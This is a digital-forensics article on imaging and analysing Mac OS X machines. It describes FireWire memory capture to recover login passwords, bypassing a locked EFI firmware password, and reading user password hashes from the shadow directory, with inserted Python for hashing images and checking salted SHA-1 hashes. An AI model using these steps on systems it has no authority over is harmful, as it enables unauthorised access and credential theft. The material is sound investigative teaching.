The first technique that can be used is to perform a live memory capture using FireWire, assuming that the target system is already logged into but in sleep mode. This can be determined by checking for activity on the front LED, which will be blinking if the laptop is asleep. Even if this LED is not blinking, before trying to turn the device on or off, a few things can be done. On a laptop, the lid can be opened. On a desktop, performing a right click should wake the device, in which case it can be put back to sleep. If these actions still yield no result, power can be applied in the case of a laptop, since the Apple MacBook and PowerBook both have a battery feature called the reserve. When battery power reaches a low point, the device is automatically put to sleep and memory is saved. This is a feature called safe sleep [Apple Portables: Progress bar appears after waking from sleep, 2011]. When power is applied, the memory is read back from the safe sleep file on disk and placed back into memory.

Once you have confirmed that the target is in sleep mode, the Windows laptop running software such as Passware Kit, together with the FireWire cable, can be used to retrieve the contents of memory. The steps to perform this can be found in detail on the respective sites, but overall the sequence of events for Passware is as follows:

- Prepare a bootable USB drive with the Passware image
- Reboot the Windows laptop using this USB drive
- Connect the FireWire cable to the target machine
- Imaging process begins and completes.

(List: Passware Usage)

After these steps are done, you have a full memory image of the target machine, which can not only be used to find the password of the logged-in user, but can also be searched for content. The recovered password can be used to log in to the running machine, or also to decrypt FileVault-protected home directories, since the same user password is used for both login and decryption [Apple Support: Encrypting Your Home Folder with File Vault, 2011]. According to the Apple site, FileVault is a system which encrypts files on a Macintosh computer. It can be found in the Mac OS X v10.4 Tiger operating system and later [Wikipedia].

If it is determined that the target system is not running and is not in sleep mode, the next step would be to acquire an image. There are a few ways to accomplish this, the first of which is to place the target system in what is known as Target Disk Mode (TDM) [Kubasiak, 2007], which causes it to act as an external FireWire hard drive. The second option is to use a boot disk. These are only possible if the firmware of the system has not been locked. In fact, you should first check whether the firmware is locked before proceeding with any of these steps, to avoid booting into the operating system. This is because swapfiles are deleted during boot, which would erase valuable data [Macenstein Website]. To determine if the firmware is locked, press and hold down the Option key before pressing the power button. Once the power button has been pressed, the Option key can be released thirty seconds later. The EFI will display one of the following screens depending on its locked state.

In the first screen, we can see the lock icon and password prompt (Figure 1) after the Option key sequence on boot. If not locked, or after unlocking, the second screen (Figure 2) will be displayed showing the boot options. Now the machine can either be restarted in TDM or booted from a forensics live boot CD or DVD such as the Helix Live Forensics OS [Helix Website].

Figure 1. Locked EFI Password Prompt

If the target system is locked, and the investigator would like to unlock it, the following simple procedure can be followed. First the system should be powered off and the bottom case opened. Next the amount of memory needs to be changed. This causes the system to recognize that some reconfiguration needs to take place. After this change is made, the system needs to be powered on while holding the Command + Option + P + R keys, until a chime is heard for the second time [Browning, J., & Galvin, A., 2010]. The keys can now be released, the system powered down, and the memory re-inserted. This procedure is only necessary if you want to boot the drive in the native system it was found in, using TDM or a live CD/DVD. Otherwise the drive itself could be removed and placed into another laptop or imaging station for image acquisition or preview. In the image, the layout of a modern MacBook Pro laptop, and how the drive and memory can be removed, are shown (Figure 3). Once the system is unlocked, TDM can be used with another system running OS X. One important procedure that should be completed before mounting a target system's drive(s) using TDM is the disabling of Disk Arbitration on the host machine that will be mounting the drive [Craiger, P., & Burke, P. 2006]. This is important because otherwise changes will be made to the target disk once it is connected and auto-mounted. Because disabling this is only possible on another OS X system, and not necessary on a Linux system, TDM should not be attempted with a Windows host. For field acquisition, in case the target system does not have a DVD-ROM drive (such as a MacBook Air), the Windows laptop in the investigator's toolkit can be either dual-booted with Linux or booted with the live CD/DVD itself, while the target is imaged using TDM. To disable Disk Arbitration in OS X, the following commands should be performed as root on the OS X forensic machine:

root# cd /usr/sbin/
root# mv diskarbitrationd diskarbitrationd_temp

This essentially moves the disk arbitration program itself to a temporary name so that it can be moved back easily later. Once these commands have completed, the forensic machine should be rebooted, and Disk Arbitration is then disabled. One caveat with this technique is that it does not work if the forensic machine is using FileVault itself. Making this change and rebooting will cause it to sit in an endless loop, and the only way to fix it will be entering single-user mode and moving the file back. In this case it would be best to use a standard hardware-based FireWire write blocker when mounting the system in TDM as an external drive. This does not appear to be documented anywhere.

Now the image can be taken using dd, either through TDM or a live CD/DVD. If using an OS X forensic machine, performing the following command will list the available drives:

Table 1. Output of diskutil

root# diskutil list
/dev/disk0
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                        *500.1 GB   disk0
   1:                        EFI                         209.7 MB   disk0s1
   2:                  Apple_HFS Meowmix                 499.8 GB   disk0s2
/dev/disk2
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:     Apple_partition_scheme                        *999.5 GB   disk2
   1:        Apple_partition_map                         32.3 KB    disk2s1
   2:                  Apple_HFS dlister                 999.5 GB   disk2s2
/dev/disk3
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                        *250.1 GB   disk3
   1:                        EFI                         209.7 MB   disk3s1
   2:                  Apple_HFS Absolut                 249.7 GB   disk3s2

Figure 2. Unlocked EFI Boot Options

Figure 3. Bottom Cover Removed from MacBook Pro

In this case we can see that we have a system with three mounted drives. The first, disk0, is the hard drive for the laptop in this example, a 500 GB SATA disk. The second, disk2, is actually a FileVault volume mounted on the user dlister's home directory. The last entry, disk3, is an external SATA drive connected through a USB docking station, with a complete OS X system image on it taken from another system. To be able to image disk3 with dd, it is first necessary to unmount it, since it was automatically mounted when plugged in. To unmount it without completely disconnecting it, run the following command:

root# diskutil unmountDisk /dev/disk3
Unmount of all volumes on disk3 was successful
(output of diskutil)

After this it is possible to run the command necessary to create an image using dd:

    root# dd if=/dev/disk3 of=/root/driveImage.dmg bs=1024

This creates an image of the external drive, or of a laptop in TDM, and places it in the root user's home directory. Commands such as this must be run as root, and assume that the root user has been created on the forensic machine. It is also important to take a hash of the drive and of the drive image once complete.
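The article calls for hashing the drive and the image but gives no command for it; the following Python is an added example, not the author's, that streams both through MD5 and SHA-256 in one pass and records a verdict for the case notes. Using a raw device path such as /dev/rdisk3 as the source is an assumption, and the demo's "device" and images are temporary files constructed inline.

```python
import hashlib
import os
import tempfile
import time

CHUNK = 1024 * 1024   # stream 1 MiB at a time; a 500 GB device must never be read into RAM

def hash_stream(path: str, algorithms=("md5", "sha256")) -> dict:
    """Hash a raw device (e.g. /dev/rdisk3 on the OS X forensic machine) or an image
    file in a single pass. Returns {algorithm: hexdigest, ..., "bytes": length}."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    total = 0
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            total += len(block)
            for h in hashers.values():
                h.update(block)
    result = {name: h.hexdigest() for name, h in hashers.items()}
    result["bytes"] = total
    return result

def verify_image(source: str, image: str, case_id: str, examiner: str) -> dict:
    """Compare the dd image with its source and return a record for the case notes.
    A size mismatch usually means dd stopped early (read error, or the destination
    filled up); equal sizes with differing digests mean the source changed between
    imaging and hashing (e.g. an auto-mount wrote to it) or the image was altered."""
    src, img = hash_stream(source), hash_stream(image)
    if src["bytes"] != img["bytes"]:
        verdict = "SIZE MISMATCH: source %d bytes, image %d bytes" % (src["bytes"], img["bytes"])
    elif any(src[a] != img[a] for a in src if a != "bytes"):
        verdict = "DIGEST MISMATCH: re-acquire the image"
    else:
        verdict = "OK"
    return {
        "case_id": case_id, "examiner": examiner,
        "hashed_at_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "source": source, "source_hashes": src,
        "image": image, "image_hashes": img,
        "verdict": verdict,
    }

def demo() -> tuple:
    """Constructed demo with a fake 3 MiB 'device', a faithful copy and a truncated copy
    that stands in for a dd run that stopped before the end of the disk."""
    workdir = tempfile.mkdtemp()
    device, good, short = (os.path.join(workdir, n) for n in ("disk3", "driveImage.dmg", "short.dmg"))
    data = os.urandom(3 * CHUNK + 12345)
    for path, content in ((device, data), (good, data), (short, data[:-4096])):
        with open(path, "wb") as fh:
            fh.write(content)
    return (verify_image(device, good, "CASE-EXAMPLE", "examiner")["verdict"],
            verify_image(device, short, "CASE-EXAMPLE", "examiner")["verdict"])
```

The returned record can be written out as JSON alongside the image so the digests are fixed at acquisition time rather than recomputed later.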

If the image was acquired successfully, and the original evidence preserved, the next step is to proceed with an analysis of the drive image and the data itself. This can be accomplished through a variety of tools, some specific to the OS X operating system, and other standard software tools which are compatible with many OSes, such as FTK.

Since the OS X operating system natively supports many types of file systems, such as HFS, HFS+, EXT, and NTFS, it is necessary to have a tool which can search and recover data on these types of partition. Some basic facts that an examiner should familiarize themselves with regarding the Hierarchical File System (HFS+) are that it was derived from the original HFS, and that it is capable of journaling as well as being case sensitive. It uses Unicode for filename storage, and also supports Unix permissions on files [Wikipedia]. Although all of these features are supported on OS X 10.4 and greater, a user can specify when creating a volume whether they want to use HFS+ with journaling or not, and also whether they would like it to be case sensitive or not. These options can be seen in Figure 4.

Other necessary features would be the ability to mount and decrypt FileVault partitions, and also to address the possibility of a dual-boot Windows and OS X target system. If the imaged drive is using whole-disk encryption it will be difficult to impossible to crack this unless a brute-force attack yields a result. Although it may also be forensically difficult in some cases to decrypt a user's home directory using a brute-force attack, it is feasible to perform a dictionary attack against the user's password hash. The hashes are contained in the /Volumes/Absolut/var/db/shadow/hash directory, and can be obtained by issuing the following command for each GUID listed. There is a single GUID for each user:

root# cat FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000000 | cut -c169-216
C642FD7E91DE8C63448DCD347A9B068D2C7538BAD35CE76A
(output of the cat command to obtain password hash)
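As an added example (not the article's code) of what the 48 characters from cut -c169-216 contain, the Python below splits that field into its salt and digest and checks whether a password the examiner already holds (for instance the one recovered from the memory image captured earlier) matches the stored hash before it is relied on for FileVault decryption. The SHA-1(salt || password) construction with a 4-byte salt, and the 1240-character record length used for padding, are assumptions stated in the code; the sample records are constructed inline.

```python
import hashlib
import hmac
import os

# `cut -c169-216` is 1-based and inclusive; in Python slice terms that is [168:216].
SALTED_SHA1 = slice(168, 216)
RECORD_LEN = 1240   # assumed length of the 10.4-10.6 hash files; only the slice above is interpreted

def parse_salted_sha1(record: str) -> tuple:
    """Split the 48-hex-character field into (4-byte salt, 40-hex SHA-1 digest)."""
    field = record.strip()[SALTED_SHA1]
    if len(field) != 48:
        raise ValueError("record too short: no salted SHA-1 field at characters 169-216")
    return bytes.fromhex(field[:8]), field[8:].lower()

def salted_sha1(salt: bytes, password: str) -> str:
    """Assumed construction: SHA-1 over the raw 4-byte salt followed by the UTF-8 password."""
    return hashlib.sha1(salt + password.encode("utf-8")).hexdigest()

def password_matches(record: str, candidate: str) -> bool:
    """True if `candidate` (e.g. the password recovered from the memory image) reproduces
    the stored digest; constant-time comparison so the check itself leaks nothing."""
    salt, digest = parse_salted_sha1(record)
    return hmac.compare_digest(salted_sha1(salt, candidate), digest)

def build_record(password: str, salt: bytes = None) -> str:
    """Constructed record for testing: every field other than the salted SHA-1 is
    zero-filled because this example does not interpret them."""
    salt = salt if salt is not None else os.urandom(4)
    field = salt.hex() + salted_sha1(salt, password)
    return "0" * SALTED_SHA1.start + field + "0" * (RECORD_LEN - SALTED_SHA1.stop)
```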

In addition, there is much valuable information contained in Spotlight search caches, Safari browser information stores, mobile device data stored as backups, and virtual machines running within the operating system on platforms such as Parallels and VMware Fusion [Joyce, R., Powers, J., & Adelstein, F., 2008]. There are also tools with very specific use cases, such as Safari Cache View from NirSoft, which allows you to view a Safari browser cache in a Windows environment [Nirsoft Website].

    Figure 4. OS X Native Partition Types


While some tools such as BlackLight from BlackBag Technologies and MacForensicsLab from SubRosaSoft do support file recovery and extraction, they do not give the holistic view when building a case that an investigator would expect from a tool like FTK. There are some tools, however, that do give a holistic view and are specific to, and run on, an OS X forensic machine against an OS X target image. One of these OS X-specific tools is called Mac Marshall, and its interface can be seen in Figure 5.

It can be seen from the image that there are quite a few recovery and search options available, from searching through virtual machines to previewing Spotlight images and videos. Spotlight is an indexing engine and search technology integrated into OS X that is used to keep track of files and their metadata. Whenever it is used, a hidden file called .Spotlight-v100 is created that contains the indexing data [Kubasiak, R. R., 2007]. It is important for the examiner to remember that since OS X is a Unix, and specifically FreeBSD-based, operating system, files are normally hidden using a leading . on the filename. It is also important to know about the Resource fork and the Data fork.

Although developers have been advised to no longer use the Resource fork, it is still possible for the examiner to encounter it. If a Macintosh file is copied or moved to a file system that does not support this feature, it will be lost. There is a special case with FAT32 volumes: OS X will create a special hidden file in the directory when a file is copied over from an HFS or HFS+ volume. For example, if a file called file.txt is copied onto a FAT32 volume, another file called ._file.txt will be created containing the Resource fork data [Kubasiak, R. R., 2007]. Also, when the file is copied back onto the HFS/HFS+ volume, the Resource fork data will be retained. This is similar to Alternate Data Streams within NTFS.

Some operations, such as recovering deleted files, can be done by simply moving them out of the trash folder. This folder exists in each user's home directory. The modified, accessed and changed timestamps can be determined for the files by running the command as follows [Craiger, P., & Burke, P., 2006]:

Table 2. Output of stat command

.Trash root# stat -x welcome.msg
  File: "welcome.msg"
  Size: 11           FileType: Regular File
  Mode: (0644/-rw-r--r--)         Uid: (  501/ dlister)  Gid: (   20/   staff)
Device: 14,5   Inode: 4001068    Links: 1
Access: Sun Dec  4 20:20:31 2011
Modify: Sat Oct 15 12:16:06 2011
Change: Sat Oct 15 12:20:58 2011

Much like other operating systems that use a recycler or trash folder, emptying the Trash folder in OS X will mark the files as deleted in the HFS+ special catalog file, which is similar to the NTFS MFT. Although the allocated file space might be overwritten after this occurs, until then the file contents still remain and are searchable with a physical-level scan.

The main applications native to any OS X installation are iTunes, iPhoto, Safari, and Apple Mail. There are also services called MobileMe and iDisk, which allow for online backup and storage of data. Within each of these applications' default data folders there is a wealth of forensic information. There is also a primary location that stores not only preference data, in the form of .plist files for each of these (and other installed) applications, but also contains registry-like information. For example, within iTunes, backups of any mobile device such as an iPhone are stored here. Using various free tools which are available, the examiner can review this data to retrieve information such as contacts, call logs, SMS text messages, and other information, which are stored in the form of a SQLite database. There is also an application called Time Capsule, which allows for automatic backup, which could be done wirelessly or even to a cloud-based (hosted) storage mechanism. Analysis of these files can be done manually, by viewing the files in a text editor, or using a tool such as MacMarshall.

In conclusion, it should not be overwhelming or prohibitively expensive to prepare a field examiner's kit in the event that one encounters a target system running OS X. This could be an Apple laptop, desktop, or modified device running OS X, but in each case the principles are the same: to acquire and analyze an image in the field or more extensively in the lab. Also, though care must be taken not to erase any volatile data, recent techniques now allow the investigator to capture passwords and bypass locked firmware to decrypt and recover previously unavailable data. Although many of these tools are available to law enforcement only, there are still many available to the general public, which can be useful for research or education.

Figure 5. Mac Marshall [Mac Marshall Website]

David Lister

David Lister (CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+) is a Security Engineer for Rackspace, and in previous roles was a software developer on various projects written in a mix of PHP, Python, Perl, Java, Ruby, C#, and .NET. He has also been active in many areas throughout the past ten years in various roles involving systems administration, network security, incident response, penetration testing, and application security.

References

1. Mcdonald, K. (2005). To image a Macintosh. Digital Investigation, 2(3), 175-179. doi: 10.1016/j.diin.2005.07.004
2. Craiger, P., & Burke, P. (2006). Chapter 13: Mac OS X Forensics.
3. Craiger, P., & Burke, P. K. (2007). Mac Forensics: Mac OS X and the HFS+ File System. CiteSeer. Retrieved from http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.182.6018&rep=rep1&type=pdf
4. Kubasiak, R. R. (2007). Macintosh Forensics. New York.
5. Joyce, R., Powers, J., & Adelstein, F. (2008). MEGA: A tool for Mac OS X operating system and application forensics. Digital Investigation, 5, S83-S90. doi: 10.1016/j.diin.2008.05.011
6. Macenstein Website (2009). The Seedy World of OS X Forensics. Retrieved from http://macenstein.com/default/2009/01/entering-the-seedy-world-of-mac-os-x-forensics/
7. Browning, J., & Galvin, A. (2010). Hack a Mac.
8. BlackBag Website (2011). Black Bag Forensics. Retrieved from https://www.blackbagtech.com/forensics.html
9. MacMarshall Websit